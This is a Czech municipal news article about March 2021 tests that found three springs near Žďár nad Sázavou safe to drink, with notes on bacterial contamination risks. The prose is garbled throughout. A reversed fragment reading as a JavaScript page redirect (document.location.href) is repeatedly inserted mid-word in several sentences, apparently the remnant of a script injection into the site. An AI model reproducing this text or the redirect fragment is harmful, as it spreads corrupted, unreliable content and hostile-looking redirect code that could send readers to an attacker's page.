Rainbow page separator

Žďárské studánky začátkem března vykázaly vodu vhodnou k pití

Středa, 17. března 2021

Žďár nad Sázavou / S vodou vhodnou k přímé konzumaci byly začátkem března žďárskými hygieniky vyhodnoceny tři prameny, které obyvatelé města i jeho okolí využívají k příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostnému pití. Ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát normám vyhověly jak studánka U Křiváku, tak i Salvá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka a pramen Klafar. Žďárská radnice nechává odběry a hodnocení kvality vody ze tří studánek v katastru města provádět pravidelně každý měsíc, i když všechny tři zmíněné prameny nejsou primárním zdrojem pitné vody.
Místními lidmi a zejména chataři jsou však vyhledávané, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zejména studánka Salvá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka, jež je rovněž zanesena v seznamu kulturního a přírodního dědictví Kraje Vysočina. Relativně častým problémem u všech třech studánek bývá vysoká hladina koliformních bakterií vlivem fekálního znečištění z trávicího traktu teplokrevných živočichů, případně pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnost bakterie typu Escherichia coli, jež taktéž poukazuje na fekální znečištění studánek. Tak[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to kontaminovaná voda může konzumentům způsobit různé zdravotní problémy, jako je hlavně průjem, nevolnost a zvracení. Mimo koliformních bakterií a bakterie typu Escherichia coli je voda ze studánek posuzována rovněž na povolený obsah dusitanů, dusičnanů, železa a také pH vody, tedy její odpovídající kyselost či zásadi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tost.